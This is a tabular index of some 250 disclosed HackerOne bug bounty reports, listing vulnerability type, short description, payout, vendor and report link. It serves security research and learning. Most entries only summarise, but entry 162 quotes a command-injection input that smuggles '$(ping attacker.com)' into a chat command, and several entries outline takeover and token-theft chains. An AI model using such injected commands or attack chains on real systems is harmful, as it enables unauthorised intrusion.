Bug Bounty Reports


Summary of almost all paid bounty reports on H1

Public Bug Bounty Reports. Open for contributions from others as well, so please send a pull request if you can!

1IDORIDOR for order delivery address$3000Mail.ruhttps://hackerone.com/reports/723461
2IDORIDOR to change API-key description$250Vismahttps://hackerone.com/reports/809967
3SSRFSTUN SSRF$3500Slackhttps://hackerone.com/reports/333419
4SQLiBlind SQLi through GET$5000Mail.ruhttps://hackerone.com/reports/786044 
5SQLiBlind SQLi through GET$5000Mail.ruhttps://hackerone.com/reports/795291
6SQLiBlind SQLi through GET$3000Mail.ruhttps://hackerone.com/reports/732430
8SQLiBlind Boolean based SQLi through GET$300Mail.ruhttps://hackerone.com/reports/398131
9Buffer OverflowBuffer Overflow $1750Valvehttps://hackerone.com/reports/458929
10Buffer OverflowBuffer Overflow $10,000Valvehttps://hackerone.com/reports/542180 
11CSRFCSRF in iOS app$2940Twitterhttps://hackerone.com/reports/805073
12Open redirectPhishing Open Redirect$560Twitterhttps://hackerone.com/reports/781673
15Information leakPrivate key disclosed$2000Slackhttps://hackerone.com/reports/531032
16Request SmugglingRequest Smuggling$6500Slackhttps://hackerone.com/reports/737140
17Account TakeoverBrute force account takeover via recovery code$3000Mail.ruhttps://hackerone.com/reports/730067
18Information leakArbitrary memory leak through API call$10,000Mail.ruhttps://hackerone.com/reports/513236
19XSSBlind Stored XSS$600Mail.ruhttps://hackerone.com/reports/659760 
20LFI (Information leak)Local File Inclusion$4000Starbuckshttps://hackerone.com/reports/780021
21LFIArbitrary file inclusion & execution$1000Valvehttps://hackerone.com/reports/508894
22Information leakLow impact information leak$500HackerOnehttps://hackerone.com/reports/826176
23Insufficient security controlsCORS misconfiguration$1000SEMrushhttps://hackerone.com/reports/235200
24Logic bugDomain authority regex logic bug$6000Googlehttps://bugs.xdavidhu.me/google/2020/03/08/the-unexpected-google-wide-domain-check-bypass/ 
25Privilege escalationAbusing backup and restore function to escalate privileges$1500Ubiquiti Inchttps://hackerone.com/reports/329659
26Privilege escalationArbritrary file deletion + DLL Hijacking leads to privilege escalation during install$667Ubiquiti Inchttps://hackerone.com/reports/530967
27Information leakUnauthenticated API endpoint leaking holiday schedule of employees in China$4000Starbuckshttps://hackerone.com/reports/659248
28Account takeoverChanging URL path from login to new-password allows merging victims store to attackers account$7500Shopifyhttps://hackerone.com/reports/796956
29Improper access controlUnauthenticated API allows enumeration of user names & phone numbers$500Razerhttps://hackerone.com/reports/752443
30Authentication bypassAuth bypass allowing access to support tickets$1500Razerhttps://hackerone.com/reports/776110
31Privilege escalationSame as below, but change of email HAS to be completed before receiving the email verification request. Rewarded due to different root cause$15,000Shopifyhttps://hackerone.com/reports/796808
32Privilege escalationTakeover any shopify store by registering email, sending email verification request, changing email and confirming request chain$15,000Shopifyhttps://hackerone.com/reports/791775
33Command injectionAbusing relative paths to run custom scripts during startup$750Slackhttps://hackerone.com/reports/784714
34Authentication bypassView webcam and run code in context of any webpage in Safari$75,000Applehttps://www.ryanpickren.com/webcam-hacking-overview
35XSSStored XSS through chat message$300Vanillahttps://hackerone.com/reports/683792
36IDORIDOR allows enumeration of users with connected google analytics or the amount of calendars owned by a single user$500SEMrushhttps://hackerone.com/reports/797685
37Logic ErrorNegative values allowed for price parameters allowed for free goods$2111SEMrushhttps://hackerone.com/reports/771694
38XSSStored XSS in customer chat$1000Shopifyhttps://hackerone.com/reports/798599
39XSSXSS through FB Group integration$500Shopifyhttps://hackerone.com/reports/267570
40SQLiError-based SQLi through GET$1500Mail.ruhttps://hackerone.com/reports/790005
41SSRFBlind SSRF$150Mail.ruhttps://hackerone.com/reports/120298
42IDORLeaking order information due to IDOR (No PII, only bought items)$150Mail.ruhttps://hackerone.com/reports/791289
43Code injectionPHP injection through unserialize() leading to code execution$3000Mail.ruhttps://hackerone.com/reports/798135
44Subdomain TakeoverDangling AWS Record allowed zone transfer, leading to access to cookies and CORS, which could facilitate phishing attacks$500Uberhttps://hackerone.com/reports/707748
45Logic ErrorNo validation that user rated his own trips, meaning drivers could alter their ratings.$1500Uberhttps://hackerone.com/reports/724522
46LFIUsing PDF-generator and an iframe, one could export the PDF with arbritrary file content$500Vismahttps://hackerone.com/reports/809819
47XSSDom XSS in IE & Edge on main page$1000ForeScout Technologieshttps://hackerone.com/reports/704266
48Logic ErrorOverwrite data as low privilege user, by renaming existing folder to the name of a folder you do not have access to$250NextCloudhttps://hackerone.com/reports/642515
49Improper access controlUnauthenticated API allowed an attacker to change hostname of device$550UniFi Cloudhttps://hackerone.com/reports/802079
50SQLiSQLi through multiple parameters, but in unused service. Data exfiltration possible.$2000Razerhttps://hackerone.com/reports/777698
51SQLiSQLi through get parameter allowed for data exfiltration from Thai users.$2000Razerhttps://hackerone.com/reports/768195
52SQLiSQLi allowing for access to data on Thai server.$2000Razerhttps://hackerone.com/reports/781205
53SSRFSSRF that could have lead to compromise of server and significant data breach$2000Razerhttps://hackerone.com/reports/777664
54Information leakPHP file with source code exposed. No exploit.$200Razerhttps://hackerone.com/reports/819735
55CSRFCSRF token with 24h lifetime, leading to possibility of connecting attackers paypal with victims shopify account$500Shopifyhttps://hackerone.com/reports/807924
56Code InjectionMacOS client is vulnerable to low-privilege attacker injecting code into the application using dylib. This is due to lack of setting the Hardened Runtime capability in XCODE$250NextCloudhttps://hackerone.com/reports/633266
57Information leakCleartext storage of API keys & tokens. Very poorly handled.$750Zenlyhttps://hackerone.com/reports/753868
58Improper access controlAWS Bucket access key transmitted in cleartext$300BCM Messengerhttps://hackerone.com/reports/764243
59Improper access controlAble to add paid function for 14 days for free$200Codahttps://hackerone.com/reports/777942
60XSSBlind XSS in admin panel through a partner’s superuser name$750Mail.ruhttps://hackerone.com/reports/746497
61XSSBlind XSS in admin panel through a partner’s superuser name (Same issue, different endpoint)$750Mail.ruhttps://hackerone.com/reports/746505
62SSRFSSRF & Local File Read via photo upload$6000Mail.ruhttps://hackerone.com/reports/748128
63SSRFSSRF & Local File Read via photo retrieving functionality$6000Mail.ruhttps://hackerone.com/reports/748069
64SSRFSSRF & Local File Read via photo editor$6000Mail.ruhttps://hackerone.com/reports/748123
65Logic ErrorA partner account with manager role could withdraw money from driver’s account$8000Mail.ruhttps://hackerone.com/reports/751347
66XSSReflected XSS through XML Namespace URI$500Mapboxhttps://hackerone.com/reports/780277
67Code InjectionHTML Injection for IE only$500Mail.ruhttps://hackerone.com/reports/757100
68DoSCache poisoning CORS allow origin header$550Automattichttps://hackerone.com/reports/591302
69IDORRemote wipe of other users device$500Nextcloudhttps://hackerone.com/reports/819807
70SSRFGitLab local instance SSRF bypass through DNS Rebinding in WebHooks$3500GitLabhttps://hackerone.com/reports/632101
71LFIopenStream called on java.net.URL allows access to local resources when passing in file:// or jar://$1800GitHub Security Labhttps://hackerone.com/reports/844327
72Logic BugNot checking if LINUX privilege is successfully dropped leads to increased attack surface$1800GitHub Security Labhttps://hackerone.com/reports/845729
73SQLiArbitrary SQL queries via DocID parameter of Websocket API$1800GitHub Security Labhttps://hackerone.com/reports/854439
74Logic BugAccount takeover through link injection in contact form$1000Insolarhttps://hackerone.com/reports/786741
75Information leakAbility to see other shops product title, only if they are using a particular app and has an attachment$500Shopifyhttps://hackerone.com/reports/848625
76XSSReflected XSS on API Server (No regular users browsing the page)$250Razerhttps://hackerone.com/reports/791941
77Brute ForceCounter-specific (?) password was not protected against brute force attacks$150Mail.ruhttps://hackerone.com/reports/754536
78Authentication bypassKnowing the victims phone number allowed access to partial information about the victims travel. Payment type, profile information, etc.$8000Mail.ruhttps://hackerone.com/reports/772118
79Information leakAPI endpoint disclosed e-mails of subscribed users$250Mail.ruhttps://hackerone.com/reports/703086
80DoSDoS & Unsafe Object creation through JSON parsing$500Rubyhttps://hackerone.com/reports/706934
81Logic ErrorSession Expiration is not enforced during signup. Bypass can be done by deleting HTML element blocking progress$100Vismahttps://hackerone.com/reports/810400
82Subdomain TakeoverSubdomain takeover due to expired / unclaimed Hubspot instance$2500Robloxhttps://hackerone.com/reports/335330
83Information leakEndpoint vulnerable to Heartbleed$1500Uberhttps://hackerone.com/reports/304190
84RCELFI through Path Traversal in image-tag in Markdown. Disclosure of local files leads to disclosure of secret, which can be used to achieve RCE through deserialization$20,000GitLabhttps://hackerone.com/reports/827052
85Prototype PollutionSimple prototype pollution due to improper handling of zipObjectDeep$250Node.js Third Party Modules (lodash)https://hackerone.com/reports/712065
86Information disclosureSession is not properly invalidated after logging out. When creating a store before upgrading your account, visitors are required to enter a password. This password is disclosed after logging out, when visiting a certain link.$500Shopifyhttps://hackerone.com/reports/837729
87IDORAble to bypass ban restrictions through path normalization. APIs are also unrestricted$800Robloxhttps://hackerone.com/reports/703058
88PhishingLink url falsification by altering post message$250Slackhttps://hackerone.com/reports/481472
89Information leakLeaking (unrestricted?) Google API key$150Identifyhttps://hackerone.com/reports/724039
90Improper access controlRead-only team members can read all properties of webhooks, through graphql$0HackerOnehttps://hackerone.com/reports/818848
91DoSDoS through sending large message to the server$500Robloxhttps://hackerone.com/reports/679907
92IDORAccess to log files based on IDOR through exposed signature in Razer Pay Android App$500Razerhttps://hackerone.com/reports/754044
93Path TraversalMisconfiguration when handling URI paths allowed for docroot path traversal giving access to non-sensitive data usually not accessible to users$500Starbuckshttps://hackerone.com/reports/844067
94Improper Certificate ValidationClient side traffic hijacking allowed for user data interception (Local?)$750Razerhttps://hackerone.com/reports/795272
95Improper authorizationThe Razer Pay backend server could be exploited to obtain transaction details from another user$500Razerhttps://hackerone.com/reports/754339
96SQLiRazer Pay API was vulnerable to SQLi exposing user information$2000Razerhttps://hackerone.com/reports/811111
97Improper authorizationReverse engineering the Android app allowed for bypassing the signatures in place to prevent parameter tampering, discovering a variety of IDOR issues$1000Razerhttps://hackerone.com/reports/753280
98HTTP Response SplittingLimited CRLF injection allowed for manipulation of cookies$150Mail.ruhttps://hackerone.com/reports/838682
99IDORIssue with the marketplace due to length restriction in choosing hashing function$5000SEMrushhttps://hackerone.com/reports/837400
100SSRFSSRF & LFI in Site Audit due to lack of connection protocol verification$2000SEMrushhttps://hackerone.com/reports/794099
101SSL DowngradePossible to temporarily downgrade a victim from HTTPS to HTTP in Firefox. Required victim clicking a link and had a very short timeframe to be successful$500Uberhttps://hackerone.com/reports/221955
102XSSReflected XSS due to outdated WordPress installation lead to exposure of sensitive form data and user data$4000Uberhttps://hackerone.com/reports/340431
103Open RedirectOpen redirect in get parameter$50Unikrnhttps://hackerone.com/reports/625546
104DoSBypassing character limitation on ´Moments´ feature and creating many of them leads to DoS$560Twitterhttps://hackerone.com/reports/819088
105CRLF InjectionCRLF injection in urllib$1000Python (IBB)https://hackerone.com/reports/590020
106Subdomain TakeoverOut of scope, no impact subdomain takeover of uptimerobot page$100BTFShttps://hackerone.com/reports/824909
107SQLiBlind Boolean-based SQLi in Razer Gold TH$1000Razerhttps://hackerone.com/reports/790914
108SSRFSSRF allowing port scanning of localhost through host header injection$300TTS Bug Bountyhttps://hackerone.com/reports/272095
109Cryptographic IssuesA variety of WPA3 issues related to cryptography and logic$750The Internethttps://hackerone.com/reports/745276
110XSSReflected XSS on resources.hackerone.com$500HackerOnehttps://hackerone.com/reports/840759
111Information leakUn-minified JS code disclosed on some pages$250Imgurhttps://hackerone.com/reports/845677
112XSSSelf-XSS to normal XSS by bypassing X-Frame-Options to automatically execute JS through loading content through iframes$250Pornhub.comhttps://hackerone.com/reports/761904
113IDORA partner account could access another partner’s driver data through an IDOR$1500mail.ruhttps://hackerone.com/reports/747612
114IDORA partner account could access information about other partners through an IDOR$1500mail.ruhttps://hackerone.com/reports/746513
115IDORA partner with manager role could takeover a drive’s account belonging to a different partner$8000mail.ruhttps://hackerone.com/reports/751281
116XSSStored XSS on messages to drivers through the operator interface$500mail.ruhttps://hackerone.com/reports/751263
117Code ExecutionPHP Code Execution through image upload functionality$3000mail.ruhttps://hackerone.com/reports/854032
118Improper Access ControlDelete projects from archived companies set to Read-Only.$100Vismahttps://hackerone.com/reports/849157
119Information leakAccount takeover due to leaking auth URLs on google & leaking OTP in API response$500Badoohttps://hackerone.com/reports/746186
120XSSStored XSS through file upload (.pdf → JS)$250Vismahttps://hackerone.com/reports/808862
121Information leak404-page leaks all headers$500HackerOnehttps://hackerone.com/reports/792998
122CSRFFriends Only account mode could be toggled through CSRF$250Mail.ruhttps://hackerone.com/reports/448928
123Subdomain TakeoverPossible due to wildcard pointing to uberflip domain$500HackerOnehttps://hackerone.com/reports/863551
124DoSImproper error handling leads to DoS and service failure in case of supplying invalid “Redirect_URI” parameter$1000GitLabhttps://hackerone.com/reports/702987
125Information leakPrivate program invites can disclose emails of any user invited by using username$7500HackerOnehttps://hackerone.com/reports/807448
126SSRFSSRF through notification configuration. Requires admin privileges$300Phabricatorhttps://hackerone.com/reports/850114
127Improper Access ControlRead-only user without access to payroll, can still access the data by visiting the URL directly$250Vismahttps://hackerone.com/reports/838563
128XSSCode does not sufficiently escape template expressions, allowing for XSS$500Ruby On Railshttps://hackerone.com/reports/474262
129Information leakPotentially sensitive information leaked through debug interface$150Mail.ruhttps://hackerone.com/reports/748925
130MisconfigurationNetwork restrictions on admin interface could be bypassed using alternate hostnames$150Mail.ruhttps://hackerone.com/reports/749677
131Request SmugglingRequest smuggling poisoning users using Host header injection$750TTShttps://hackerone.com/reports/726773
132Lack of security mechanismsLack of user warning when opening potentially dangerous files from the chat window$250Mail.ruhttps://hackerone.com/reports/633600
133XSSReflected XSS in investor relations website due to unsanitized user input$350Razerhttps://hackerone.com/reports/801075
134SQLiBlind SQLi due to no input sanitization on “Top Up” function in Razer Gold TH service$1000Razerhttps://hackerone.com/reports/789259
135Subdomain TakeoverSubdomain takeover$250Razerhttps://hackerone.com/reports/810807
136Open redirectOpen redirect in login flow$150TTShttps://hackerone.com/reports/798742
137Race ConditionRace condition in email verification that awards in-game currency, leading to similar impact as payment bypass$2000InnoGameshttps://hackerone.com/reports/509629
138Account TakeoverLinks on in-game forum leaks referer header, which contains CSRF token. The page also embeds links with the cookie value on the page. Utilizing self-xss combined with CSRF-token, you can grab cookie from DOM and send it to attacker resulting in Account Takeover$1100InnoGameshttps://hackerone.com/reports/604120
139XSSReflected XSS due to insufficient input sanitation. Could allow for account takeover or user session manipulation.$1900PayPalhttps://hackerone.com/reports/753835
140XSSStored XSS through bypass of file type upload limit by 0-byte. Uploading a xx.html%00.pdf with JS will work like a stored XSS when accessed$250Vismahttps://hackerone.com/reports/808821
141Improper AuthenticationAn issue in how Cloudflare’s authoritative DNS server processes requests with “:” in it. This allows an attacker to spoof NXDOMAINs within safe zones.$400Open-Xchangehttps://hackerone.com/reports/858854
142Improper Access ControlCan reply or delete replies from any users in any public group, without joining said group. (Buddypress)$225WordPresshttps://hackerone.com/reports/837256
143Privilege EscalationAuthor role has access to edit, trash and add new items within the BuddyPress Emails.$225WordPresshttps://hackerone.com/reports/833782
144CSRFProfile field CSRF allows for deleting any field in BuddyPress$225WordPresshttps://hackerone.com/reports/836187
145Privilege EscalationIDOR + Changing parameter from “Moderator” to “Admin” leads to privilege escalation$225WordPresshttps://hackerone.com/reports/837018
146Privilege EscalationChaining 5 vulnerabilities leads to privilege to root, by: Symlink attack combined with race condition leads to executing malicious code$500NordVPNhttps://hackerone.com/reports/767647
147XSSReflected XSS evading WAF + confirming insufficient fix$1000Glassdoorhttps://hackerone.com/reports/846338
148Information leakNew retest functionality discloses existence of private programs through having the tag added to the program description$500HackerOnehttps://hackerone.com/reports/871142
149XSSOutdated PDF.js allows for XSS using CVE-2018-5158$100Nextcloudhttps://hackerone.com/reports/819863
150DoSDoS due to having a large amount of groups and sending a tampered request (Changed Accept-Encoding & User-Agent)$500HackerOnehttps://hackerone.com/reports/861170
151XSSStored XSS in user profile$200QIWIhttps://hackerone.com/reports/365093
152Logic BugService time expiry validation bypass leads to unlimited use due to bypassing licensing time checks$400NordVPNhttps://hackerone.com/reports/865828
153Improper Access ControlPrivilege escalation through improper access control on /membership/ endpoint$500Heliumhttps://hackerone.com/reports/809816
154IDORSending invitations is vulnerable to IDOR attack, resulting in being able to invite any account as administrator of a organization, by knowing the organizations UUID$100Heliumhttps://hackerone.com/reports/835005
155Improper Access ControlDcoker Registry API v2 exposed through HTTP, allowing for dumping & poisoning of docker images.$2000Semmlehttps://hackerone.com/reports/347296
156Code InjectionCodeQL query to detect JNDI injections$2300GitHubhttps://hackerone.com/reports/892465
157Information leakGraphQL query can disclose information about undisclosed reports to the HackerOne program due to the retest feature$2500HackerOnehttps://hackerone.com/reports/871749
158Logic BugCodeQL query to detect improper URL handling$1800GitHubhttps://hackerone.com/reports/891268
159Information leakCodeQL query to detect Spring Boot actuator endpoints$1800GitHubhttps://hackerone.com/reports/891266
160Logic BugCodeeQL query to detect incorrect conversion between numeric types in GOLang$1800GitHubhttps://hackerone.com/reports/891265
161Improper Access ControlCertain API methods were not properly restricted and leaked statistics about arbitrary domains$400Mail.ruhttps://hackerone.com/reports/831663
162Code InjectionUsing chat commands functions like “/calculate 1+1” is possible, but it can be abused by using BASH syntax for executing commands “/calculate $(ping attacker.com)”, leading to arbitrary code execution$3000Nextcloudhttps://hackerone.com/reports/851807
163Privilege EscalationCan invite members to a “clan” even when the user does not have access to that function$550InnoGameshttps://hackerone.com/reports/511275
164XSSAirMax software was vulnerable to Reflected XSS on multiple end-points and parameters$150Ubiquiti inc.https://hackerone.com/reports/386570
165Privilege EscalationChanging email parameter allows privilege escalation to admin$100Heliumhttps://hackerone.com/reports/813159
166Information leakCodeQL query to detect logging of sensitive data$500GitHubhttps://hackerone.com/reports/886287
167CSRFCSRF is possible in the AirMax software on multiple endpoints leading to possible firmware downgrade, config modification, file or token ex-filtration etc.$1100Ubiquiti inc.https://hackerone.com/reports/323852
168Account TakeoverNo brute-force protection on SMS verification endpoint lead to account takeover$1700Mail.ruhttps://hackerone.com/reports/744662
169IDORAPI allowed for leaking information on job seekers / employers through IDOR$500Mail.ruhttps://hackerone.com/reports/743687
170XSSReflected XSS through URI on 404 page$300Mail.ruhttps://hackerone.com/reports/797717
171SSRFSSRF through using functionality from included library that should be disabled$10,000GitLabhttps://hackerone.com/reports/826361
172Information leakInsufficient verification leads to ability to read sensitive files$10,000GitLabhttps://hackerone.com/reports/850447
173Improper AuthenticationCould impersonate and answer tickets belonging to other users$550InnoGameshttps://hackerone.com/reports/876573
174Subdomain TakeoverSubdomain takeover of iosota.razersynapse.com$200Razerhttps://hackerone.com/reports/813313
175XSSReflected xss through cookies on ftp server for Thai employees$375Razerhttps://hackerone.com/reports/748217
176XSSOut of scope DOM XSS leading to impact on account security for in scope asset. Only applicable to IE and Edge.$750Rockstar Gameshttps://hackerone.com/reports/663312
177SQLiSearch function was crashable disclosing error logs with useful information for other potential attacks.$250Rockstar Gameshttps://hackerone.com/reports/808832
178Open RedirectCould potentially leak sensitive tokens through referer header on GTA Online sub-site.$750Rockstar Gameshttps://hackerone.com/reports/798121
179XSSDOM XSS in GTA Online feedback endpoint. Other issues with the same root cause was also found on the same site.$1250Rockstar Gameshttps://hackerone.com/reports/803934
180DoSIn email verification emails, the unique number is assigned sequentially, meaning you can invalidate all future registrations by visiting the following URL. Ex: confirmmail/1/jfaiu -> confirmmail/2/jfaiu$150Vanillahttps://hackerone.com/reports/329209
181Information leakExternal images could be referenced in the screenshot utility feature, possibly leading to FaceBook OAUTH token theft$500Rockstar Gameshttps://hackerone.com/reports/497655
182XSSDom XSS on main page achieved through multiple minor issues, like path traversal and open redirect$850Rockstar Gameshttps://hackerone.com/reports/475442
183XSSStored XSS through demo function in multiple parameters using javascript scheme$750Shopifyhttps://hackerone.com/reports/439912
184Improper access controlAfter removing admin access from an account, it can still make changes with admin permissions until logged out. The account can also still make changes to embedded apps, but this is by design.$1000Shopifyhttps://hackerone.com/reports/273099
185CSRFAccount takeover on social club by using CSRF to link an account to the attackers facebook account, leading to the ability to login as the victim$1000Rockstar Gameshttps://hackerone.com/reports/474833
186XSSReflected XSS due to decoding and executing code after the last “/” on GTAOnline/jp.$750Rockstar Gameshttps://hackerone.com/reports/507494
187Open RedirectOpen Redirect on the support page, impacting the mobile page$750Rockstar gameshttps://hackerone.com/reports/781718
188XSSDOM XSS on GTAOnline. Regressed Directory Traversal and new XSS issue$750Rockstar gameshttps://hackerone.com/reports/479612
189Race Condition (TOCTOU)Can click “This Rocks” (like) button any number of times, allowing an attacker to fill up the victims notification feed$250Rockstar gameshttps://hackerone.com/reports/474021
190XSSDOM XSS in the video section of GTAOnline page through returnurl-parameter, only exploitable on non-English versions.$750Rockstar gameshttps://hackerone.com/reports/505157
191CSRFCSRF on login page only, due to processing credentials before checking for CSRF protections. This is also only valid when forcing non 4xx responses from the server$500HackerOnehttps://hackerone.com/reports/834366
192RCERCE Through Blind SQLI in Where clause$5500QIWIhttps://hackerone.com/reports/816254
193RCERCE Through Blind SQLI in Where clause$1000QIWIhttps://hackerone.com/reports/816560
194RCERCE through Blind SQLI in prepared statement$1000QIWIhttps://hackerone.com/reports/816086
195IDORRead-only user can change name of device in admin account$50Heliumhttps://hackerone.com/reports/865115
196Path TraversalAccess to restricted data through path traversal (requires valid authentication cookie)$4000Starbuckshttps://hackerone.com/reports/876295
197XSSCombining two minor harmless injections results in dom based Reflected XSS$250Starbuckshttps://hackerone.com/reports/396493
198XSSBypass of previous issue by encoding ” as %2522$250Starbuckshttps://hackerone.com/reports/252908
199SQLiBlind, time-based SQLi due to unsafe handling of GET parameter$15,000Mail.ruhttps://hackerone.com/reports/868436
200SSRFBy being able to redirect key lookups (since they are on your own domain and the lookup is done over DNS), you can trick the sending server into accessing arbitrary addresses.$400Open-Xchangehttps://hackerone.com/reports/792960
201SSRFSame as 201 but through different code. Being able to control DNS records for your own domain, you can redirect servers accessing your domain to get your public key into returning data from an internal asset.$400Open-Xchangehttps://hackerone.com/reports/792953
202XSSDOM XSS through XSS payload in UID field of key. Exploited by sending key to the victim, which then imports it.$500Open-Xchangehttps://hackerone.com/reports/788691
203Information disclosureAttacker can leak OAUTH token due to redirect_uri not properly detecting IDN Homograph attacks (Unicode character confusion attack – é = e)$1000SEMrushhttps://hackerone.com/reports/861940
204DoSDoS through no length restriction on the “instruction” field when creating a new program.$2500HackerOnehttps://hackerone.com/reports/887321
205CSRFCSRF token is not checked$250Vismahttps://hackerone.com/reports/878443
206Path TraversalBy executing a path traversal attack on the frontend, arbitrary API calls on the (internal only) backend was possible. This lead to being able to enumerate 100 million real users.$4000Starbuckshttps://samcurry.net/hacking-starbucks/
207Privacy ViolationIncorrect usage of Google AD ID integration lead to privacy issue$200NordVPNhttps://hackerone.com/reports/803941
208Insecure design principlesIncluding vendor based eval-stdin.php leads to potential RCE$100NextCloudhttps://hackerone.com/reports/820146
209CSRFLack of CSRF protection when linking FaceBook account with Social Club account, lead to potential takeover. Required preconditions and deception to succeed.$550Rockstar Gameshttps://hackerone.com/reports/653254
210Information Disclosurea chain of vulnerabilities leads to being able to possibly exfiltrate user tokens. One part was image injection in Screenshot-View function.$500Rockstar Gameshttps://hackerone.com/reports/655288
211Information DisclosureImage injection in www.rockstargames.com/bully/screens could be combined with other minor issues to leak user tokens.$500Rockstar Gameshttps://hackerone.com/reports/661646
212XSSDOM XSS in localized (different languages) Red Dead Redemption 2 video viewer. www.rockstargames.com/reddeadredemption2/br/videos$750Rockstar Gameshttps://hackerone.com/reports/488108
213CSRFCSRF issue in language changing function for GTA Online could be chained with other vulnerabilities to leak user tokens.$500Rockstar Gameshttps://hackerone.com/reports/809691
214Information DisclosureImage injection on www.rockstargames.com/bully/anniversaryedition. Could be combined with other issues to leak user tokens.$500Rockstar Gameshttps://hackerone.com/reports/498358
215Information DisclosureImage injection-fix bypass in the screenshot-viewer utility$500Rockstar Gameshttps://hackerone.com/reports/505259
216Information DisclosureAnother Image injection-fix bypass in the screenshot-viewer utility$500Rockstar Gameshttps://hackerone.com/reports/506126
217XSSFlash file based Open Redirect and XSS vulnerability.$500Rockstar Gameshttps://hackerone.com/reports/485382
218Open RedirectOpen Redirect in changing language functionality on https://www.rockstargames.com/GTAOnline. This could be used to leak sensitive tokens from the URL through Referer header.$500Rockstar Gameshttps://hackerone.com/reports/870062
219XSSLocalized (different languages) versions of https://www.rockstargames.com/GTAOnline/ was vulnerable to DOM XSS in various locations. This combined with Open Redirect allowed for user token exfiltration.$750Rockstar Gameshttps://hackerone.com/reports/508517
220Information DisclosureImage injection on localized (different languages) versions of games/info endpoint (https://www.rockstargames.com/br/#/games/info). This could lead to leaking user tokens through Referer header.$500Rockstar Gameshttps://hackerone.com/reports/510388
221Information DisclosureAttack chain leading to leaking OAUTH tokens. Image injection in https://www.rockstargames.com/bully/anniversaryedition combined with other minor issues allowed for this attack to be successful.$500Rockstar Gameshttps://hackerone.com/reports/659784
222XSSDOM XSS in localized versions of GTA Online screenshot site, like the following: https://www.rockstargames.com/GTAOnline/jp/screens/$750Rockstar Gameshttps://hackerone.com/reports/508475
223XSSDOM XSS in www.rockstargames.com/GTAOnline/features/freemode$750Rockstar Gameshttps://hackerone.com/reports/799739
224Improper AuthenticationHost(origin) checking of Digits SDK passes attacker controlled string to function expecting regex, leading to using regex-specific characters in the domain name allowing for bypassing the check. (“.” matching any character). The impact was account takeover.$5040Twitterhttps://hackerone.com/reports/129873
225CSRFUser token leak through referer header, by abusing vulnerable chain of issues. This was due to insufficient refer header policy. The url was extracted through abusing an Open Redirect issue. The vulnerable endpoint was socialclub.rockstargames.com/crew/$750Rockstar Gameshttps://hackerone.com/reports/787160
226CSRFLeaking user tokens through referer header by exploiting a chain of issues. The part handled in this report is Image injection leading to XSS on https://www.rockstargames.com/newswire/article$750Rockstar Gameshttps://hackerone.com/reports/790465
227CSRFImage injection on www.rockstargames.com/IV/screens/1280x720Image.html can be combined with other issues to leak user tokens.$500Rockstar Gameshttps://hackerone.com/reports/784101
228Information disclosureImage injection on https://www.rockstargames.com/careers#/offices/. Combined in a chain with other attacks could lead to leaking user tokens.$500Rockstar Gameshttps://hackerone.com/reports/491654
229Insufficient Session ExpirationNo session invalidation after logout. Attacker can reuse known tokens$100Vismahttps://hackerone.com/reports/808731
230Remote File InclusionRemote file inclusion through downloading file from chat. Uses path traversal to extract anywhere, and it can be hidden by setting a title for the file.$5000Keybasehttps://hackerone.com/reports/713006
231Insecure Design PrinciplesUsing RTLO (Right to left override) character allows spoofing the URL that will be displayed when navigating out of rinkerboats.vanillacommunities.com leading to potential phishing / other attacks.$150Vanillahttps://hackerone.com/reports/563268
232XSSStored XSS in the Customer Number field.$250Vismahttps://hackerone.com/reports/882189
233Information disclosureCodeQL query to detect J2EE server having directory listing enabled, potentially allowing for source code disclosure.$1800Github Security Labhttps://hackerone.com/reports/909374
234XSSXSS in account.mail.ru due to unsafe handling of GET parameter (User-assisted == Requires user interaction?)$1000Mail.ruhttps://hackerone.com/reports/889874
235Information leakMySQL credentials leaked to publicly available config file$150Mail.ruhttps://hackerone.com/reports/879389
236SSRFSSRF through using the relap.io function allowing for fetching external resources, allowing access to the production network in a transparent manner. (Non-blind)$1700Mail.ruhttps://hackerone.com/reports/739962
237XSSStored XSS by authenticated user to all other users through the /wp-admin/edit.php?post_type=forum endpoint$225WordPresshttps://hackerone.com/reports/881918
238Information leakA misconfigured web directory disclosed files that showed NordVPNs public proxy list and corresponding port numbers$50NordVPNhttps://hackerone.com/reports/791826
239Privilege EscalationAn attacker can kick out any other member of any organization, given that they know the membership ID of the user. This is due to an IDOR in the delete membership functionality, which can be triggered by: DELETE /api/memberships/id$100Heliumhttps://hackerone.com/reports/810320
240Command InjectionReflected XSS in certain endpoints allows account takeover. Attackers can also perform sensitive actions on behalf of authenticated users.$594Ubiquiti Inc.https://hackerone.com/reports/661647
241Command InjectionCertain end-points are vulnerable to command injection when using specifically crafted input, leading to RCE. This vulnerability can be triggered through other vulnerabilities, like XSS and CSRF.$6839Ubiquiti Inc.https://hackerone.com/reports/703659
242Logic bugBat files and other malicious executables (or any other filetypes and content) can be concealed as normal content, like .csv files by including illegal characters as content.$1500Slackhttps://hackerone.com/reports/833080
243XSSXSS through unsafe URI handling in ASP.net on base starbucks.com domain$500Starbuckshttps://hackerone.com/reports/881115
244BruteforceUser passwords can be brute forced due to lack of rate limiting$700Twitterhttps://hackerone.com/reports/854424
245Request Smugglingconsole.helium.com is vulnerable to CL.TE request smuggling.$500Heliumhttps://hackerone.com/reports/867952
246CSRFCSRF allowing an attacker to import any novel to the victims chatstory (pixiv service)$500Pixivhttps://hackerone.com/reports/534908
247Improper Authentication2FA bypass by not supplying a 2FA code. Likely lack of null check. Vulnerable request is likely something like this: "email":"attack@lol.com","2FA":""$1000Glassdoorhttps://hackerone.com/reports/897385
248Logic BugUsers are able for forge requests, leading to being able to spawn additional units at will. This is done through (what looks like) a leaked secret and a lack of proper server side validation.$1100InnoGameshttps://hackerone.com/reports/802636
249Open RedirectOpen redirect requiring user to click in order to work$100LocalTapiolahttps://hackerone.com/reports/194017
250Insecure design principlesCodeQL query to check for improper SSL certificates$1800GitHubhttps://hackerone.com/reports/917454
251Command injectionCodeQL query to detect OGNL injection$2300Githubhttps://hackerone.com/reports/917455
252Use after freeA use-after-free vulnerability exists in the IPV6 option of setsockopt, as it is possible to race and free the struct_ip6_pktopts buffer (TOCTOU) while it is being handled by ip6_setpktopt. This struct contains pointers that can be used for R/W primitives in the kernel. Combining this vulnerability with a known WebKit issue allows for easy exploitation.$10,000PlayStationhttps://hackerone.com/reports/826026
253CSRF/community/create-post.js was vulnerable to CSRF attacks, allowing an attacker to spam the community boards as other users. This attack was only possible through Chrome.$150Rockstar Gameshttps://hackerone.com/reports/487378
